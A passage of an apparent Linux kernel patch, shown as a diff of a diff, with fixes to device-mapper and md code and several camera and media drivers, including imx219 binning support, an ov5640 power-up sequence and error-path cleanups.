+ 			throttle_work_update(&pool->throttle);
+ 			dm_pool_issue_prefetches(pool->pmd);
+ 		}
++		cond_resched();
+ 	}
+ 	blk_finish_plug(&plug);
+ }
+@@ -2289,6 +2290,7 @@ static void process_thin_deferred_cells(struct thin_c *tc)
+ 			else
+ 				pool->process_cell(tc, cell);
+ 		}
++		cond_resched();
+ 	} while (!list_empty(&cells));
+ }
+ 
+diff --git a/drivers/md/dm-zoned-metadata.c b/drivers/md/dm-zoned-metadata.c
+index 0278482fac94a..c795ea7da7917 100644
+--- a/drivers/md/dm-zoned-metadata.c
++++ b/drivers/md/dm-zoned-metadata.c
+@@ -2945,7 +2945,7 @@ int dmz_ctr_metadata(struct dmz_dev *dev, int num_dev,
+ 	zmd->mblk_shrinker.seeks = DEFAULT_SEEKS;
+ 
+ 	/* Metadata cache shrinker */
+-	ret = register_shrinker(&zmd->mblk_shrinker, "md-meta:(%u:%u)",
++	ret = register_shrinker(&zmd->mblk_shrinker, "dm-zoned-meta:(%u:%u)",
+ 				MAJOR(dev->bdev->bd_dev),
+ 				MINOR(dev->bdev->bd_dev));
+ 	if (ret) {
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index d49809e9db96e..d727ed9cd623f 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -231,7 +231,6 @@ out_uevent_exit:
+ 
+ static void local_exit(void)
+ {
+-	flush_scheduled_work();
+ 	destroy_workqueue(deferred_remove_workqueue);
+ 
+ 	unregister_blkdev(_major, _name);
+@@ -1021,6 +1020,7 @@ static void dm_wq_requeue_work(struct work_struct *work)
+ 		io->next = NULL;
+ 		__dm_io_complete(io, false);
+ 		io = next;
++		cond_resched();
+ 	}
+ }
+ 
+@@ -2185,10 +2185,7 @@ static struct dm_table *__bind(struct mapped_device *md, struct dm_table *t,
+ 	if (size != dm_get_size(md))
+ 		memset(&md->geometry, 0, sizeof(md->geometry));
+ 
+-	if (!get_capacity(md->disk))
+-		set_capacity(md->disk, size);
+-	else
+-		set_capacity_and_notify(md->disk, size);
++	set_capacity(md->disk, size);
+ 
+ 	dm_table_event_callback(t, event_callback, md);
+ 
+@@ -2582,6 +2579,7 @@ static void dm_wq_work(struct work_struct *work)
+ 			break;
+ 
+ 		submit_bio_noacct(bio);
++		cond_resched();
+ 	}
+ }
+ 
+@@ -2981,24 +2979,26 @@ EXPORT_SYMBOL_GPL(dm_internal_resume_fast);
+  * Event notification.
+  *---------------------------------------------------------------*/
+ int dm_kobject_uevent(struct mapped_device *md, enum kobject_action action,
+-		       unsigned cookie)
++		      unsigned cookie, bool need_resize_uevent)
+ {
+ 	int r;
+ 	unsigned noio_flag;
+ 	char udev_cookie[DM_COOKIE_LENGTH];
+-	char *envp[] = { udev_cookie, NULL };
+-
+-	noio_flag = memalloc_noio_save();
+-
+-	if (!cookie)
+-		r = kobject_uevent(&disk_to_dev(md->disk)->kobj, action);
+-	else {
++	char *envp[3] = { NULL, NULL, NULL };
++	char **envpp = envp;
++	if (cookie) {
+ 		snprintf(udev_cookie, DM_COOKIE_LENGTH, "%s=%u",
+ 			 DM_COOKIE_ENV_VAR_NAME, cookie);
+-		r = kobject_uevent_env(&disk_to_dev(md->disk)->kobj,
+-				       action, envp);
++		*envpp++ = udev_cookie;
++	}
++	if (need_resize_uevent) {
++		*envpp++ = "RESIZE=1";
+ 	}
+ 
++	noio_flag = memalloc_noio_save();
++
++	r = kobject_uevent_env(&disk_to_dev(md->disk)->kobj, action, envp);
++
+ 	memalloc_noio_restore(noio_flag);
+ 
+ 	return r;
+diff --git a/drivers/md/dm.h b/drivers/md/dm.h
+index 5201df03ce402..a9a3ffcad084c 100644
+--- a/drivers/md/dm.h
++++ b/drivers/md/dm.h
+@@ -203,7 +203,7 @@ int dm_get_table_device(struct mapped_device *md, dev_t dev, fmode_t mode,
+ void dm_put_table_device(struct mapped_device *md, struct dm_dev *d);
+ 
+ int dm_kobject_uevent(struct mapped_device *md, enum kobject_action action,
+-		      unsigned cookie);
++		      unsigned cookie, bool need_resize_uevent);
+ 
+ void dm_internal_suspend(struct mapped_device *md);
+ void dm_internal_resume(struct mapped_device *md);
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index b911085060dc3..0368b3c51c7f7 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -9039,7 +9039,7 @@ void md_do_sync(struct md_thread *thread)
+ 	mddev->pers->sync_request(mddev, max_sectors, &skipped);
+ 
+ 	if (!test_bit(MD_RECOVERY_CHECK, &mddev->recovery) &&
+-	    mddev->curr_resync >= MD_RESYNC_ACTIVE) {
++	    mddev->curr_resync > MD_RESYNC_ACTIVE) {
+ 		if (test_bit(MD_RECOVERY_SYNC, &mddev->recovery)) {
+ 			if (test_bit(MD_RECOVERY_INTR, &mddev->recovery)) {
+ 				if (mddev->curr_resync >= mddev->recovery_cp) {
+diff --git a/drivers/media/i2c/imx219.c b/drivers/media/i2c/imx219.c
+index 77bd79a5954ed..7a14688f8c228 100644
+--- a/drivers/media/i2c/imx219.c
++++ b/drivers/media/i2c/imx219.c
+@@ -89,6 +89,12 @@
+ 
+ #define IMX219_REG_ORIENTATION		0x0172
+ 
++/* Binning  Mode */
++#define IMX219_REG_BINNING_MODE		0x0174
++#define IMX219_BINNING_NONE		0x0000
++#define IMX219_BINNING_2X2		0x0101
++#define IMX219_BINNING_2X2_ANALOG	0x0303
++
+ /* Test Pattern Control */
+ #define IMX219_REG_TEST_PATTERN		0x0600
+ #define IMX219_TEST_PATTERN_DISABLE	0
+@@ -143,25 +149,66 @@ struct imx219_mode {
+ 
+ 	/* Default register values */
+ 	struct imx219_reg_list reg_list;
++
++	/* 2x2 binning is used */
++	bool binning;
+ };
+ 
+-/*
+- * Register sets lifted off the i2C interface from the Raspberry Pi firmware
+- * driver.
+- * 3280x2464 = mode 2, 1920x1080 = mode 1, 1640x1232 = mode 4, 640x480 = mode 7.
+- */
+-static const struct imx219_reg mode_3280x2464_regs[] = {
+-	{0x0100, 0x00},
++static const struct imx219_reg imx219_common_regs[] = {
++	{0x0100, 0x00},	/* Mode Select */
++
++	/* To Access Addresses 3000-5fff, send the following commands */
+ 	{0x30eb, 0x0c},
+ 	{0x30eb, 0x05},
+ 	{0x300a, 0xff},
+ 	{0x300b, 0xff},
+ 	{0x30eb, 0x05},
+ 	{0x30eb, 0x09},
+-	{0x0114, 0x01},
+-	{0x0128, 0x00},
+-	{0x012a, 0x18},
++
++	/* PLL Clock Table */
++	{0x0301, 0x05},	/* VTPXCK_DIV */
++	{0x0303, 0x01},	/* VTSYSCK_DIV */
++	{0x0304, 0x03},	/* PREPLLCK_VT_DIV 0x03 = AUTO set */
++	{0x0305, 0x03}, /* PREPLLCK_OP_DIV 0x03 = AUTO set */
++	{0x0306, 0x00},	/* PLL_VT_MPY */
++	{0x0307, 0x39},
++	{0x030b, 0x01},	/* OP_SYS_CLK_DIV */
++	{0x030c, 0x00},	/* PLL_OP_MPY */
++	{0x030d, 0x72},
++
++	/* Undocumented registers */
++	{0x455e, 0x00},
++	{0x471e, 0x4b},
++	{0x4767, 0x0f},
++	{0x4750, 0x14},
++	{0x4540, 0x00},
++	{0x47b4, 0x14},
++	{0x4713, 0x30},
++	{0x478b, 0x10},
++	{0x478f, 0x10},
++	{0x4793, 0x10},
++	{0x4797, 0x0e},
++	{0x479b, 0x0e},
++
++	/* Frame Bank Register Group "A" */
++	{0x0162, 0x0d},	/* Line_Length_A */
++	{0x0163, 0x78},
++	{0x0170, 0x01}, /* X_ODD_INC_A */
++	{0x0171, 0x01}, /* Y_ODD_INC_A */
++
++	/* Output setup registers */
++	{0x0114, 0x01},	/* CSI 2-Lane Mode */
++	{0x0128, 0x00},	/* DPHY Auto Mode */
++	{0x012a, 0x18},	/* EXCK_Freq */
+ 	{0x012b, 0x00},
++};
++
++/*
++ * Register sets lifted off the i2C interface from the Raspberry Pi firmware
++ * driver.
++ * 3280x2464 = mode 2, 1920x1080 = mode 1, 1640x1232 = mode 4, 640x480 = mode 7.
++ */
++static const struct imx219_reg mode_3280x2464_regs[] = {
+ 	{0x0164, 0x00},
+ 	{0x0165, 0x00},
+ 	{0x0166, 0x0c},
+@@ -174,53 +221,13 @@ static const struct imx219_reg mode_3280x2464_regs[] = {
+ 	{0x016d, 0xd0},
+ 	{0x016e, 0x09},
+ 	{0x016f, 0xa0},
+-	{0x0170, 0x01},
+-	{0x0171, 0x01},
+-	{0x0174, 0x00},
+-	{0x0175, 0x00},
+-	{0x0301, 0x05},
+-	{0x0303, 0x01},
+-	{0x0304, 0x03},
+-	{0x0305, 0x03},
+-	{0x0306, 0x00},
+-	{0x0307, 0x39},
+-	{0x030b, 0x01},
+-	{0x030c, 0x00},
+-	{0x030d, 0x72},
+ 	{0x0624, 0x0c},
+ 	{0x0625, 0xd0},
+ 	{0x0626, 0x09},
+ 	{0x0627, 0xa0},
+-	{0x455e, 0x00},
+-	{0x471e, 0x4b},
+-	{0x4767, 0x0f},
+-	{0x4750, 0x14},
+-	{0x4540, 0x00},
+-	{0x47b4, 0x14},
+-	{0x4713, 0x30},
+-	{0x478b, 0x10},
+-	{0x478f, 0x10},
+-	{0x4793, 0x10},
+-	{0x4797, 0x0e},
+-	{0x479b, 0x0e},
+-	{0x0162, 0x0d},
+-	{0x0163, 0x78},
+ };
+ 
+ static const struct imx219_reg mode_1920_1080_regs[] = {
+-	{0x0100, 0x00},
+-	{0x30eb, 0x05},
+-	{0x30eb, 0x0c},
+-	{0x300a, 0xff},
+-	{0x300b, 0xff},
+-	{0x30eb, 0x05},
+-	{0x30eb, 0x09},
+-	{0x0114, 0x01},
+-	{0x0128, 0x00},
+-	{0x012a, 0x18},
+-	{0x012b, 0x00},
+-	{0x0162, 0x0d},
+-	{0x0163, 0x78},
+ 	{0x0164, 0x02},
+ 	{0x0165, 0xa8},
+ 	{0x0166, 0x0a},
+@@ -233,49 +240,13 @@ static const struct imx219_reg mode_1920_1080_regs[] = {
+ 	{0x016d, 0x80},
+ 	{0x016e, 0x04},
+ 	{0x016f, 0x38},
+-	{0x0170, 0x01},
+-	{0x0171, 0x01},
+-	{0x0174, 0x00},
+-	{0x0175, 0x00},
+-	{0x0301, 0x05},
+-	{0x0303, 0x01},
+-	{0x0304, 0x03},
+-	{0x0305, 0x03},
+-	{0x0306, 0x00},
+-	{0x0307, 0x39},
+-	{0x030b, 0x01},
+-	{0x030c, 0x00},
+-	{0x030d, 0x72},
+ 	{0x0624, 0x07},
+ 	{0x0625, 0x80},
+ 	{0x0626, 0x04},
+ 	{0x0627, 0x38},
+-	{0x455e, 0x00},
+-	{0x471e, 0x4b},
+-	{0x4767, 0x0f},
+-	{0x4750, 0x14},
+-	{0x4540, 0x00},
+-	{0x47b4, 0x14},
+-	{0x4713, 0x30},
+-	{0x478b, 0x10},
+-	{0x478f, 0x10},
+-	{0x4793, 0x10},
+-	{0x4797, 0x0e},
+-	{0x479b, 0x0e},
+ };
+ 
+ static const struct imx219_reg mode_1640_1232_regs[] = {
+-	{0x0100, 0x00},
+-	{0x30eb, 0x0c},
+-	{0x30eb, 0x05},
+-	{0x300a, 0xff},
+-	{0x300b, 0xff},
+-	{0x30eb, 0x05},
+-	{0x30eb, 0x09},
+-	{0x0114, 0x01},
+-	{0x0128, 0x00},
+-	{0x012a, 0x18},
+-	{0x012b, 0x00},
+ 	{0x0164, 0x00},
+ 	{0x0165, 0x00},
+ 	{0x0166, 0x0c},
+@@ -288,53 +259,13 @@ static const struct imx219_reg mode_1640_1232_regs[] = {
+ 	{0x016d, 0x68},
+ 	{0x016e, 0x04},
+ 	{0x016f, 0xd0},
+-	{0x0170, 0x01},
+-	{0x0171, 0x01},
+-	{0x0174, 0x01},
+-	{0x0175, 0x01},
+-	{0x0301, 0x05},
+-	{0x0303, 0x01},
+-	{0x0304, 0x03},
+-	{0x0305, 0x03},
+-	{0x0306, 0x00},
+-	{0x0307, 0x39},
+-	{0x030b, 0x01},
+-	{0x030c, 0x00},
+-	{0x030d, 0x72},
+ 	{0x0624, 0x06},
+ 	{0x0625, 0x68},
+ 	{0x0626, 0x04},
+ 	{0x0627, 0xd0},
+-	{0x455e, 0x00},
+-	{0x471e, 0x4b},
+-	{0x4767, 0x0f},
+-	{0x4750, 0x14},
+-	{0x4540, 0x00},
+-	{0x47b4, 0x14},
+-	{0x4713, 0x30},
+-	{0x478b, 0x10},
+-	{0x478f, 0x10},
+-	{0x4793, 0x10},
+-	{0x4797, 0x0e},
+-	{0x479b, 0x0e},
+-	{0x0162, 0x0d},
+-	{0x0163, 0x78},
+ };
+ 
+ static const struct imx219_reg mode_640_480_regs[] = {
+-	{0x0100, 0x00},
+-	{0x30eb, 0x05},
+-	{0x30eb, 0x0c},
+-	{0x300a, 0xff},
+-	{0x300b, 0xff},
+-	{0x30eb, 0x05},
+-	{0x30eb, 0x09},
+-	{0x0114, 0x01},
+-	{0x0128, 0x00},
+-	{0x012a, 0x18},
+-	{0x012b, 0x00},
+-	{0x0162, 0x0d},
+-	{0x0163, 0x78},
+ 	{0x0164, 0x03},
+ 	{0x0165, 0xe8},
+ 	{0x0166, 0x08},
+@@ -347,35 +278,10 @@ static const struct imx219_reg mode_640_480_regs[] = {
+ 	{0x016d, 0x80},
+ 	{0x016e, 0x01},
+ 	{0x016f, 0xe0},
+-	{0x0170, 0x01},
+-	{0x0171, 0x01},
+-	{0x0174, 0x03},
+-	{0x0175, 0x03},
+-	{0x0301, 0x05},
+-	{0x0303, 0x01},
+-	{0x0304, 0x03},
+-	{0x0305, 0x03},
+-	{0x0306, 0x00},
+-	{0x0307, 0x39},
+-	{0x030b, 0x01},
+-	{0x030c, 0x00},
+-	{0x030d, 0x72},
+ 	{0x0624, 0x06},
+ 	{0x0625, 0x68},
+ 	{0x0626, 0x04},
+ 	{0x0627, 0xd0},
+-	{0x455e, 0x00},
+-	{0x471e, 0x4b},
+-	{0x4767, 0x0f},
+-	{0x4750, 0x14},
+-	{0x4540, 0x00},
+-	{0x47b4, 0x14},
+-	{0x4713, 0x30},
+-	{0x478b, 0x10},
+-	{0x478f, 0x10},
+-	{0x4793, 0x10},
+-	{0x4797, 0x0e},
+-	{0x479b, 0x0e},
+ };
+ 
+ static const struct imx219_reg raw8_framefmt_regs[] = {
+@@ -485,6 +391,7 @@ static const struct imx219_mode supported_modes[] = {
+ 			.num_of_regs = ARRAY_SIZE(mode_3280x2464_regs),
+ 			.regs = mode_3280x2464_regs,
+ 		},
++		.binning = false,
+ 	},
+ 	{
+ 		/* 1080P 30fps cropped */
+@@ -501,6 +408,7 @@ static const struct imx219_mode supported_modes[] = {
+ 			.num_of_regs = ARRAY_SIZE(mode_1920_1080_regs),
+ 			.regs = mode_1920_1080_regs,
+ 		},
++		.binning = false,
+ 	},
+ 	{
+ 		/* 2x2 binned 30fps mode */
+@@ -517,6 +425,7 @@ static const struct imx219_mode supported_modes[] = {
+ 			.num_of_regs = ARRAY_SIZE(mode_1640_1232_regs),
+ 			.regs = mode_1640_1232_regs,
+ 		},
++		.binning = true,
+ 	},
+ 	{
+ 		/* 640x480 30fps mode */
+@@ -533,6 +442,7 @@ static const struct imx219_mode supported_modes[] = {
+ 			.num_of_regs = ARRAY_SIZE(mode_640_480_regs),
+ 			.regs = mode_640_480_regs,
+ 		},
++		.binning = true,
+ 	},
+ };
+ 
+@@ -979,6 +889,35 @@ static int imx219_set_framefmt(struct imx219 *imx219)
+ 	return -EINVAL;
+ }
+ 
++static int imx219_set_binning(struct imx219 *imx219)
++{
++	if (!imx219->mode->binning) {
++		return imx219_write_reg(imx219, IMX219_REG_BINNING_MODE,
++					IMX219_REG_VALUE_16BIT,
++					IMX219_BINNING_NONE);
++	}
++
++	switch (imx219->fmt.code) {
++	case MEDIA_BUS_FMT_SRGGB8_1X8:
++	case MEDIA_BUS_FMT_SGRBG8_1X8:
++	case MEDIA_BUS_FMT_SGBRG8_1X8:
++	case MEDIA_BUS_FMT_SBGGR8_1X8:
++		return imx219_write_reg(imx219, IMX219_REG_BINNING_MODE,
++					IMX219_REG_VALUE_16BIT,
++					IMX219_BINNING_2X2_ANALOG);
++
++	case MEDIA_BUS_FMT_SRGGB10_1X10:
++	case MEDIA_BUS_FMT_SGRBG10_1X10:
++	case MEDIA_BUS_FMT_SGBRG10_1X10:
++	case MEDIA_BUS_FMT_SBGGR10_1X10:
++		return imx219_write_reg(imx219, IMX219_REG_BINNING_MODE,
++					IMX219_REG_VALUE_16BIT,
++					IMX219_BINNING_2X2);
++	}
++
++	return -EINVAL;
++}
++
+ static const struct v4l2_rect *
+ __imx219_get_pad_crop(struct imx219 *imx219,
+ 		      struct v4l2_subdev_state *sd_state,
+@@ -1041,6 +980,13 @@ static int imx219_start_streaming(struct imx219 *imx219)
+ 	if (ret < 0)
+ 		return ret;
+ 
++	/* Send all registers that are common to all modes */
++	ret = imx219_write_regs(imx219, imx219_common_regs, ARRAY_SIZE(imx219_common_regs));
++	if (ret) {
++		dev_err(&client->dev, "%s failed to send mfg header\n", __func__);
++		goto err_rpm_put;
++	}
++
+ 	/* Apply default values of current mode */
+ 	reg_list = &imx219->mode->reg_list;
+ 	ret = imx219_write_regs(imx219, reg_list->regs, reg_list->num_of_regs);
+@@ -1056,6 +1002,13 @@ static int imx219_start_streaming(struct imx219 *imx219)
+ 		goto err_rpm_put;
+ 	}
+ 
++	ret = imx219_set_binning(imx219);
++	if (ret) {
++		dev_err(&client->dev, "%s failed to set binning: %d\n",
++			__func__, ret);
++		goto err_rpm_put;
++	}
++
+ 	/* Apply customized values from user */
+ 	ret =  __v4l2_ctrl_handler_setup(imx219->sd.ctrl_handler);
+ 	if (ret)
+diff --git a/drivers/media/i2c/max9286.c b/drivers/media/i2c/max9286.c
+index 9c083cf142319..d034a67042e35 100644
+--- a/drivers/media/i2c/max9286.c
++++ b/drivers/media/i2c/max9286.c
+@@ -932,6 +932,7 @@ static int max9286_v4l2_register(struct max9286_priv *priv)
+ err_put_node:
+ 	fwnode_handle_put(ep);
+ err_async:
++	v4l2_ctrl_handler_free(&priv->ctrls);
+ 	max9286_v4l2_notifier_unregister(priv);
+ 
+ 	return ret;
+diff --git a/drivers/media/i2c/ov2740.c b/drivers/media/i2c/ov2740.c
+index 5d74ad4792146..628ab86698c08 100644
+--- a/drivers/media/i2c/ov2740.c
++++ b/drivers/media/i2c/ov2740.c
+@@ -630,8 +630,10 @@ static int ov2740_init_controls(struct ov2740 *ov2740)
+ 				     V4L2_CID_TEST_PATTERN,
+ 				     ARRAY_SIZE(ov2740_test_pattern_menu) - 1,
+ 				     0, 0, ov2740_test_pattern_menu);
+-	if (ctrl_hdlr->error)
++	if (ctrl_hdlr->error) {
++		v4l2_ctrl_handler_free(ctrl_hdlr);
+ 		return ctrl_hdlr->error;
++	}
+ 
+ 	ov2740->sd.ctrl_handler = ctrl_hdlr;
+ 
+diff --git a/drivers/media/i2c/ov5640.c b/drivers/media/i2c/ov5640.c
+index 3f6d715efa823..873087e180561 100644
+--- a/drivers/media/i2c/ov5640.c
++++ b/drivers/media/i2c/ov5640.c
+@@ -50,6 +50,7 @@
+ #define OV5640_REG_SYS_CTRL0		0x3008
+ #define OV5640_REG_SYS_CTRL0_SW_PWDN	0x42
+ #define OV5640_REG_SYS_CTRL0_SW_PWUP	0x02
++#define OV5640_REG_SYS_CTRL0_SW_RST	0x82
+ #define OV5640_REG_CHIP_ID		0x300a
+ #define OV5640_REG_IO_MIPI_CTRL00	0x300e
+ #define OV5640_REG_PAD_OUTPUT_ENABLE01	0x3017
+@@ -532,7 +533,7 @@ static const struct v4l2_mbus_framefmt ov5640_default_fmt = {
+ };
+ 
+ static const struct reg_value ov5640_init_setting[] = {
+-	{0x3103, 0x11, 0, 0}, {0x3008, 0x82, 0, 5}, {0x3008, 0x42, 0, 0},
++	{0x3103, 0x11, 0, 0},
+ 	{0x3103, 0x03, 0, 0}, {0x3630, 0x36, 0, 0},
+ 	{0x3631, 0x0e, 0, 0}, {0x3632, 0xe2, 0, 0}, {0x3633, 0x12, 0, 0},
+ 	{0x3621, 0xe0, 0, 0}, {0x3704, 0xa0, 0, 0}, {0x3703, 0x5a, 0, 0},
+@@ -2424,24 +2425,48 @@ static void ov5640_power(struct ov5640_dev *sensor, bool enable)
+ 	gpiod_set_value_cansleep(sensor->pwdn_gpio, enable ? 0 : 1);
+ }
+ 
+-static void ov5640_reset(struct ov5640_dev *sensor)
++/*
++ * From section 2.7 power up sequence:
++ * t0 + t1 + t2 >= 5ms	Delay from DOVDD stable to PWDN pull down
++ * t3 >= 1ms		Delay from PWDN pull down to RESETB pull up
++ * t4 >= 20ms		Delay from RESETB pull up to SCCB (i2c) stable
++ *
++ * Some modules don't expose RESETB/PWDN pins directly, instead providing a
++ * "PWUP" GPIO which is wired through appropriate delays and inverters to the
++ * pins.
++ *
++ * In such cases, this gpio should be mapped to pwdn_gpio in the driver, and we
++ * should still toggle the pwdn_gpio below with the appropriate delays, while
++ * the calls to reset_gpio will be ignored.
++ */
++static void ov5640_powerup_sequence(struct ov5640_dev *sensor)
+ {
+-	if (!sensor->reset_gpio)
+-		return;
+-
+-	gpiod_set_value_cansleep(sensor->reset_gpio, 0);
++	if (sensor->pwdn_gpio) {
++		gpiod_set_value_cansleep(sensor->reset_gpio, 0);
+ 
+-	/* camera power cycle */
+-	ov5640_power(sensor, false);
+-	usleep_range(5000, 10000);
+-	ov5640_power(sensor, true);
+-	usleep_range(5000, 10000);
++		/* camera power cycle */
++		ov5640_power(sensor, false);
++		usleep_range(5000, 10000);
++		ov5640_power(sensor, true);
++		usleep_range(5000, 10000);
+ 
+-	gpiod_set_value_cansleep(sensor->reset_gpio, 1);
+-	usleep_range(1000, 2000);
++		gpiod_set_value_cansleep(sensor->reset_gpio, 1);
++		usleep_range(1000, 2000);
+ 
+-	gpiod_set_value_cansleep(sensor->reset_gpio, 0);
++		gpiod_set_value_cansleep(sensor->reset_gpio, 0);
++	} else {
++		/* software reset */
++		ov5640_write_reg(sensor, OV5640_REG_SYS_CTRL0,
++				 OV5640_REG_SYS_CTRL0_SW_RST);
++	}
+ 	usleep_range(20000, 25000);
++
++	/*
++	 * software standby: allows registers programming;
++	 * exit at restore_mode() for CSI, s_stream(1) for DVP
++	 */
++	ov5640_write_reg(sensor, OV5640_REG_SYS_CTRL0,
++			 OV5640_REG_SYS_CTRL0_SW_PWDN);
+ }
+ 
+ static int ov5640_set_power_on(struct ov5640_dev *sensor)
+@@ -2464,8 +2489,7 @@ static int ov5640_set_power_on(struct ov5640_dev *sensor)
+ 		goto xclk_off;
+ 	}
+ 
+-	ov5640_reset(sensor);
+-	ov5640_power(sensor, true);
++	ov5640_powerup_sequence(sensor);
+ 
+ 	ret = ov5640_init_slave_id(sensor);
+ 	if (ret)
+diff --git a/drivers/media/i2c/ov5675.c b/drivers/media/i2c/ov5675.c
+index 94dc8cb7a7c00..a6e6b367d1283 100644
+--- a/drivers/media/i2c/ov5675.c
++++ b/drivers/media/i2c/ov5675.c
+@@ -820,8 +820,10 @@ static int ov5675_init_controls(struct ov5675 *ov5675)
+ 	v4l2_ctrl_new_std(ctrl_hdlr, &ov5675_ctrl_ops,
+ 			  V4L2_CID_VFLIP, 0, 1, 1, 0);
+ 
+-	if (ctrl_hdlr->error)
++	if (ctrl_hdlr->error) {
++		v4l2_ctrl_handler_free(ctrl_hdlr);
+ 		return ctrl_hdlr->error;
++	}
+ 
+ 	ov5675->sd.ctrl_handler = ctrl_hdlr;
+ 
+diff --git a/drivers/media/i2c/ov7670.c b/drivers/media/i2c/ov7670.c
+index 4b9b156b53c7a..c06364c1cbd1b 100644
+--- a/drivers/media/i2c/ov7670.c
++++ b/drivers/media/i2c/ov7670.c
+@@ -1841,7 +1841,7 @@ static int ov7670_parse_dt(struct device *dev,
+ 
+ 	if (bus_cfg.bus_type != V4L2_MBUS_PARALLEL) {
+ 		dev_err(dev, "Unsupported media bus type\n");
+-		return ret;
++		return -EINVAL;
+ 	}
+ 	info->mbus_config = bus_cfg.bus.parallel.flags;
+ 
+diff --git a/drivers/media/i2c/ov772x.c b/drivers/media/i2c/ov772x.c
+index 4189e3fc3d535..a238e63425f8c 100644
+--- a/drivers/media/i2c/ov772x.c
++++ b/drivers/media/i2c/ov772x.c
+@@ -1462,7 +1462,7 @@ static int ov772x_probe(struct i2c_client *client)
+ 	priv->subdev.ctrl_handler = &priv->hdl;
+ 	if (priv->hdl.error) {
+ 		ret = priv->hdl.error;
+-		goto error_mutex_destroy;
++		goto error_ctrl_free;
+ 	}
+ 
+ 	priv->clk = clk_get(&client->dev, NULL);
+@@ -1515,7 +1515,6 @@ error_clk_put:
+ 	clk_put(priv->clk);
+ error_ctrl_free:
+ 	v4l2_ctrl_handler_free(&priv->hdl);
+-error_mutex_destroy:
+ 	mutex_destroy(&priv->lock);
+ 
+ 	return ret;
+diff --git a/drivers/media/mc/mc-entity.c b/drivers/media/mc/mc-entity.c
+index b8bcbc734eaf4..f268cf66053e1 100644
+--- a/drivers/media/mc/mc-entity.c
++++ b/drivers/media/mc/mc-entity.c
+@@ -703,7 +703,7 @@ done:
+ __must_check int __media_pipeline_start(struct media_pad *pad,
+ 					struct media_pipeline *pipe)
+ {
+-	struct media_device *mdev = pad->entity->graph_obj.mdev;
++	struct media_device *mdev = pad->graph_obj.mdev;
+ 	struct media_pipeline_pad *err_ppad;
+ 	struct media_pipeline_pad *ppad;
+ 	int ret;
+@@ -851,7 +851,7 @@ EXPORT_SYMBOL_GPL(__media_pipeline_start);
+ __must_check int media_pipeline_start(struct media_pad *pad,
+ 				      struct media_pipeline *pipe)
+ {
+-	struct media_device *mdev = pad->entity->graph_obj.mdev;
++	struct media_device *mdev = pad->graph_obj.mdev;
+ 	int ret;
+ 
+ 	mutex_lock(&mdev->graph_mutex);
+@@ -888,7 +888,7 @@ EXPORT_SYMBOL_GPL(__media_pipeline_stop);
+ 
+ void media_pipeline_stop(struct media_pad *pad)
+ {
+-	struct media_device *mdev = pad->entity->graph_obj.mdev;
++	struct media_device *mdev = pad->graph_obj.mdev;
+ 
+ 	mutex_lock(&mdev->graph_mutex);
+ 	__media_pipeline_stop(pad);
+@@ -898,7 +898,7 @@ EXPORT_SYMBOL_GPL(media_pipeline_stop);
+ 
+ __must_check int media_pipeline_alloc_start(struct media_pad *pad)
+ {
+-	struct media_device *mdev = pad->entity->graph_obj.mdev;
++	struct media_device *mdev = pad->graph_obj.mdev;
+ 	struct media_pipeline *new_pipe = NULL;
+ 	struct media_pipeline *pipe;
+ 	int ret;
+diff --git a/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c b/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c
+index 390bd5ea34724..3b76a9d0383a8 100644
+--- a/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c
++++ b/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c
+@@ -1843,6 +1843,9 @@ static void cio2_pci_remove(struct pci_dev *pci_dev)
+ 	v4l2_device_unregister(&cio2->v4l2_dev);
+ 	media_device_cleanup(&cio2->media_dev);
+ 	mutex_destroy(&cio2->lock);
++
++	pm_runtime_forbid(&pci_dev->dev);
++	pm_runtime_get_noresume(&pci_dev->dev);
+ }
+ 
+ static int __maybe_unused cio2_runtime_suspend(struct device *dev)
+diff --git a/drivers/media/pci/saa7134/saa7134-core.c b/drivers/media/pci/saa7134/saa7134-core.c
+index 96328b0af1641..cf2871306987c 100644
+--- a/drivers/media/pci/saa7134/saa7134-core.c
++++ b/drivers/media/pci/saa7134/saa7134-core.c
+@@ -978,7 +978,7 @@ static void saa7134_unregister_video(struct saa7134_dev *dev)
+ 	}
+ 	if (dev->radio_dev) {
+ 		if (video_is_registered(dev->radio_dev))
+-			vb2_video_unregister_device(dev->radio_dev);
++			video_unregister_device(dev->radio_dev);
+ 		else
+ 			video_device_release(dev->radio_dev);
+ 		dev->radio_dev = NULL;
+diff --git a/drivers/media/platform/amphion/vpu_color.c b/drivers/media/platform/amphion/vpu_color.c
+index 80b9a53fd1c14..4ae435cbc5cda 100644
+--- a/drivers/media/platform/amphion/vpu_color.c
++++ b/drivers/media/platform/amphion/vpu_color.c
+@@ -17,7 +17,7 @@
+ #include "vpu_helpers.h"
+ 
+ static const u8 colorprimaries[] = {
+-	0,
++	V4L2_COLORSPACE_LAST,
+ 	V4L2_COLORSPACE_REC709,         /*Rec. ITU-R BT.709-6*/
+ 	0,
+ 	0,
+@@ -31,7 +31,7 @@ static const u8 colorprimaries[] = {
+ };
+ 
+ static const u8 colortransfers[] = {
+-	0,
++	V4L2_XFER_FUNC_LAST,
+ 	V4L2_XFER_FUNC_709,             /*Rec. ITU-R BT.709-6*/
+ 	0,
+ 	0,
+@@ -53,7 +53,7 @@ static const u8 colortransfers[] = {
+ };
+ 
+ static const u8 colormatrixcoefs[] = {
+-	0,
++	V4L2_YCBCR_ENC_LAST,
+ 	V4L2_YCBCR_ENC_709,              /*Rec. ITU-R BT.709-6*/
+ 	0,
+ 	0,
+diff --git a/drivers/media/platform/mediatek/mdp3/Kconfig b/drivers/media/platform/mediatek/mdp3/Kconfig
+index 50ae07b75b5f2..602329c447501 100644
+--- a/drivers/media/platform/mediatek/mdp3/Kconfig
++++ b/drivers/media/platform/mediatek/mdp3/Kconfig
+@@ -3,15 +3,13 @@ config VIDEO_MEDIATEK_MDP3
+ 	tristate "MediaTek MDP v3 driver"
+ 	depends on MTK_IOMMU || COMPILE_TEST
+ 	depends on VIDEO_DEV
+-	depends on ARCH_MEDIATEK || COMPILE_TEST
+ 	depends on HAS_DMA
+ 	depends on REMOTEPROC
++	depends on MTK_MMSYS
++	depends on MTK_CMDQ
++	depends on MTK_SCP
